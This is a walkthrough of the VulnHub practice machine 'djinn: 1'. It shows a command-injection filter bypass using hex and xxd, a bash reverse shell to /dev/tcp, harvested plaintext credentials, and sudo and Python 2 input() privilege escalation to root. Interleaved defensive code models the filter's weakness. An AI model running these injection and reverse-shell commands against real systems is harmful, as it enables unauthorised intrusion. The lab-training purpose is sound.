Hack djinn:1 : walkthrough [VulnHub lab] Penetration Testing Practice Series 7

Lab address: djinn: 1

Lab description:

  • Level: Beginner-Intermediate
  • flags: user.txt and root.txt
  • Description: The machine is VirtualBox as well as VMWare compatible. The DHCP will assign an IP automatically. You'll see the IP right on the login screen. You have to find and read two flags (user and root) which is present in user.txt and root.txt respectively.
  • Format: Virtual Machine (Virtualbox - OVA)
  • Operating System: Linux

After the VM is installed, the login screen looks like this:


A port scan shows ports 21, 1337 and 7331 open.

The FTP port allows anonymous login.

Had a look at the web port; no common vulnerabilities there.


First, check whether there is anything special on the FTP server.

Got some information: nitu:81299 and the username nitish. Since there is no SSH port, set this aside for now.

Telnet to port 1337 and you find a math game.

I wrote a small Python program for it:

#!/usr/bin/python
# -*- coding: UTF-8 -*-
# Auto-solver for the arithmetic game served on port 1337


import logging
import telnetlib
import time


class TelnetClient():
    def __init__(self):
        self.tn = telnetlib.Telnet()

    def login_host(self, host_ip, host_port):
        try:
            self.tn.open(host_ip, port=host_port)
        except (OSError, IOError):
            logging.warning('%s: network connection failed' % host_ip)
            return False

        loop = 0
        while loop < 1010:
            loop = loop + 1
            time.sleep(0.1)
            command_result = self.tn.read_very_eager().decode('ascii')
            print(command_result)
            # The question arrives as a tuple such as (3, '+', 4);
            # skip reads that do not carry a question yet instead of
            # letting rindex() raise ValueError
            if '(' not in command_result or ')' not in command_result:
                continue
            start = command_result.rindex('(') + 1
            end = command_result.rindex(')')
            q = command_result[start:end]
            print(q)
            arr = q.split(", ")
            if len(arr) != 3:
                continue
            a1 = int(arr[0])
            a2 = int(arr[2])
            print(a1)
            print(arr[1])
            print(a2)
            retval = ""
            if arr[1] == "'+'":
                retval = str(a1 + a2)
            if arr[1] == "'-'":
                retval = str(a1 - a2)
            if arr[1] == "'*'":
                retval = str(a1 * a2)
            if arr[1] == "'/'":
                # isinstance(a1/a2, int) never holds in Python 3 (true division
                # always yields a float), so test for an exact division instead:
                # send the integer quotient when it divides evenly, else "a1/a2"
                if a2 != 0 and a1 % a2 == 0:
                    retval = str(a1 // a2)
                else:
                    retval = str(a1) + "/" + str(a2)
            print(retval)
            self.tn.write(retval.encode('ascii') + b'\n')


if __name__ == '__main__':
    host_ip = '192.168.92.175'
    port = 1337

    telnet_client = TelnetClient()
    telnet_client.login_host(host_ip, port)

The answers are computed automatically; you can try it yourselves.

Next, look at the web service on port 7331.

Scan for files and directories.

There are only two pages: the wish page executes a shell command, and genie is the page that shows the result.

I used Burp to work out a bypass; xxd worked for me, and you can try other bypasses.

The following characters are filtered: . * / $ ?

POST /wish HTTP/1.1
Host: 192.168.31.166:7331
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.31.166:7331/wish
Content-Type: application/x-www-form-urlencoded
Content-Length: 58
Connection: close
Upgrade-Insecure-Requests: 1

cmd=echo "0x636174202f6574632f706173737764"|xxd -r -p|bash

Tested that the xxd stage executes fine, so go straight to a reverse shell: bash -i >& /dev/tcp/192.168.31.198/1234 0>&1
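As an added example (my own code, not from the walkthrough or from the djinn box), here is a small Python model of why the character blacklist on /wish fails: the blacklist passes the hex-wrapped request because it only inspects the literal text, a decoder of the xxd -r -p stage recovers the real command for log review, and an allowlist check over the parsed argv rejects the request. The BLOCKED set is the one reported above; the allowlist contents are an assumption for illustration.

```python
import re
import shlex

# Characters the walkthrough reports the /wish filter rejecting.
BLOCKED = set('.*/$?')

# Programs an allowlisting handler might permit (assumed for illustration).
ALLOWED_ARGV0 = {'id', 'uptime', 'date'}

# Matches the echo "<hex>" | xxd -r -p stage. The optional 0x prefix is
# accepted because xxd ignores the unpaired 'x' and pairs the remaining nibbles.
HEX_STAGE = re.compile(r'echo\s+"?(?:0x)?([0-9a-fA-F]+)"?\s*\|\s*xxd\s+-r\s+-p', re.I)


def blacklist_allows(cmd):
    """True if the blacklist filter would let cmd through (it only sees the literal text)."""
    return not (BLOCKED & set(cmd))


def decode_hex_stage(cmd):
    """Return the command hidden behind a hex/xxd stage, or None if there is none."""
    m = HEX_STAGE.search(cmd)
    if m is None:
        return None
    hexstr = m.group(1)
    if len(hexstr) % 2:  # not a whole number of bytes: nothing to decode
        return None
    return bytes.fromhex(hexstr).decode('utf-8', 'replace')


def effective_command(cmd):
    """What the shell would really run: the decoded stage if present, else cmd itself."""
    inner = decode_hex_stage(cmd)
    return cmd if inner is None else inner


def allowlist_allows(cmd):
    """Parse cmd as argv and accept only a known program with plain arguments.
    A handler built this way passes argv to subprocess.run(argv) with shell=False,
    so there is no shell left for metacharacters to reach."""
    try:
        argv = shlex.split(cmd)
    except ValueError:
        return False
    if not argv or argv[0] not in ALLOWED_ARGV0:
        return False
    return all(re.fullmatch(r'[A-Za-z0-9_-]+', a) for a in argv[1:])
```

Running effective_command() over the request body and feeding the result back into blacklist_allows() shows that the decoded command would have been blocked on its own, which is the whole point of the wrapping.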

After it runs, the reverse connection arrives in meterpreter.

Because I had tested on a different machine earlier, the address changed along the way; bear with me.

Check /etc/passwd:


root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing+List+Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats+Bug-Reporting+System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd+Network+Management,,,:/run/systemd/netif:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd+Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin
syslog:x:102:106::/home/syslog:/usr/sbin/nologin
messagebus:x:103:107::/nonexistent:/usr/sbin/nologin
_apt:x:104:65534::/nonexistent:/usr/sbin/nologin
lxd:x:105:65534::/var/lib/lxd/:/bin/false
uuidd:x:106:110::/run/uuidd:/usr/sbin/nologin
dnsmasq:x:107:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
landscape:x:108:112::/var/lib/landscape:/usr/sbin/nologin
sshd:x:109:65534::/run/sshd:/usr/sbin/nologin
pollinate:x:110:1::/var/cache/pollinate:/bin/false
sam:x:1000:1000:sam,,,:/home/sam:/bin/bash
ftp:x:111:115:ftp+daemon,,,:/srv/ftp:/usr/sbin/nologin
nitish:x:1001:1001::/home/nitish:/bin/bash

Two users found: sam and nitish.

First, look for SUID files usable for privilege escalation.

Found a readable file, creds.txt, under nitish's directory:

cat /home/nitish/.dev/creds.txt
nitish:p4ssw0rdStr3r0n9

Got the username and password; since there is no SSH port, we switch users with su nitish.

www-data@djinn:/opt/80$ python -c 'import pty; pty.spawn("/bin/bash")'
python -c 'import pty; pty.spawn("/bin/bash")'
www-data@djinn:/opt/80$ su nitish
su nitish
Password: p4ssw0rdStr3r0n9

nitish@djinn:/opt/80$ cd /home
cd /home
nitish@djinn:/home$ ls
ls
nitish  sam
nitish@djinn:/home$ cd nitish
cd nitish
nitish@djinn:~$ ls -l
ls -l
total 4
-rw-r----- 1 nitish nitish 33 Nov 12 17:29 user.txt
nitish@djinn:~$ cat user.txt
cat user.txt
10aay8289ptgguy1pvfa73alzusyyx3c
nitish@djinn:~$ 

After switching users, user.txt is in the home directory: that's the first flag.

From the earlier SUID check there is a special file, /usr/bin/genie, which can be run directly:

sudo -u sam genie -cmd whoami

Escalated to user sam; run sudo -l to see what turns up.

sam@djinn:/home/sam$ sudo -l
sudo -l
Matching Defaults entries for sam on djinn:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User sam may run the following commands on djinn:
    (root) NOPASSWD: /root/lago
sam@djinn:/home/sam$ sudo -u root /root/lago 

There is a program that can be run as root: lago

sudo -u root /root/lago 
What do you want to do ?
1 - Be naughty
2 - Guess the number
3 - Read some damn files
4 - Work
Enter your choice:

It's a small program; nothing special found at first glance.

Next, search for files as user sam.

Found a .pyc file; pulled it down and decompiled it:

#!/usr/bin/env python
# encoding: utf-8

from getpass import getuser
from os import system
from random import randint

def naughtyboi():
    print 'Working on it!! '


def guessit():
    num = randint(1, 101)
    print 'Choose a number between 1 to 100: '
    s = input('Enter your number: ')
    if s == num:
        system('/bin/sh')
    else:
        print 'Better Luck next time'


def readfiles():
    user = getuser()
    path = input('Enter the full of the file to read: ')
    print 'User %s is not allowed to read %s' % (user, path)


def options():
    print 'What do you want to do ?'
    print '1 - Be naughty'
    print '2 - Guess the number'
    print '3 - Read some damn files'
    print '4 - Work'
    choice = int(input('Enter your choice: '))
    return choice


def main(op):
    if op == 1:
        naughtyboi()
    elif op == 2:
        guessit()
    elif op == 3:
        readfiles()
    elif op == 4:
        print 'work your ass off!!'
    else:
        print 'Do something better with your life'

if __name__ == '__main__':
    main(options())

Analysing the program shows a spot where a shell can be obtained: this is Python 2, where input() evaluates the typed text as an expression in the function's scope, so entering num yields the variable num itself and s == num is always true.
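As an added example (mine, not the box's lago script), the core of guessit() modelled in Python 3: guess_py2_semantics reproduces the Python 2 input() behaviour (eval of the typed text with the local name num in scope) that makes the reply num always win, and guess_hardened parses the reply strictly as an integer so the typed text is never treated as code. The function names and the eval-based model are assumptions for illustration.

```python
def guess_py2_semantics(answer, num):
    """Model of the decompiled guessit(): in Python 2, input() is
    eval(raw_input()), so the typed text is evaluated with the local
    name num visible before the comparison.  Modelled here with eval on
    a namespace that exposes num, which is exactly what gives the reply
    "num" a guaranteed match."""
    try:
        s = eval(answer, {"__builtins__": {}}, {"num": num})
    except Exception:
        return False
    return s == num


def guess_hardened(answer, num):
    """Same check with the reply parsed strictly as an integer: anything
    that is not a number is just a wrong guess and never reaches the
    comparison as code.  (The remaining problem, a NOPASSWD sudo entry
    that lets this script spawn /bin/sh as root, is a sudoers issue,
    not an input-parsing one.)"""
    try:
        s = int(answer.strip())
    except ValueError:
        return False
    return s == num
```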

sudo -u root /root/lago 
What do you want to do ?
1 - Be naughty
2 - Guess the number
3 - Read some damn files
4 - Work
Enter your choice:2
2
Choose a number between 1 to 100: 
Enter your number: num
num
# id
id
uid=0(root) gid=0(root) groups=0(root)
# ls -la /root/
ls -la /root/
total 64
drwx------  5 root root  4096 Nov 18 13:06 .
drwxr-xr-x 23 root root  4096 Nov 11 18:50 ..
-rw-------  1 root root 23351 Nov 18 13:06 .bash_history
-rw-r--r--  1 root root  3106 Apr  9  2018 .bashrc
drwx------  3 root root  4096 Oct 21 19:40 .cache
drwx------  3 root root  4096 Oct 21 19:40 .gnupg
-rwxr-xr-x  1 root root  1827 Nov 14 20:57 lago
drwxr-xr-x  3 root root  4096 Oct 20 23:50 .local
-rw-r--r--  1 root root   148 Aug 17  2015 .profile
-rwxr-xr-x  1 root root   457 Nov 12 21:24 proof.sh
# sh /root/proof.sh
sh /root/proof.sh
'unknown': I need something more specific.
    _                        _             _ _ _ 
   / \   _ __ ___   __ _ ___(_)_ __   __ _| | | |
  / _ \ | '_ ` _ \ / _` |_  / | '_ \ / _` | | | |
 / ___ \| | | | | | (_| |/ /| | | | | (_| |_|_|_|
/_/   \_\_| |_| |_|\__,_/___|_|_| |_|\__, (_|_|_)
                                     |___/       
djinn pwned...
__________________________________________________________________________

Proof: 33eur2wjdmq80z47nyy4fx54bnlg3ibc
Path: /home/sam
Date: Fri Dec 13 20:32:01 IST 2019
Whoami: root
__________________________________________________________________________

By @0xmzfr

Thanks to my fellow teammates in @m0tl3ycr3w for betatesting! :-)

# 

Escalated to root, then ran sh proof.sh to get the second flag. Done!


Summary

1. Spent a long time on FTP and port 1337; in the end the information gathered there turned out to be red herrings.

2. Learned a lot from the shell filter bypass.
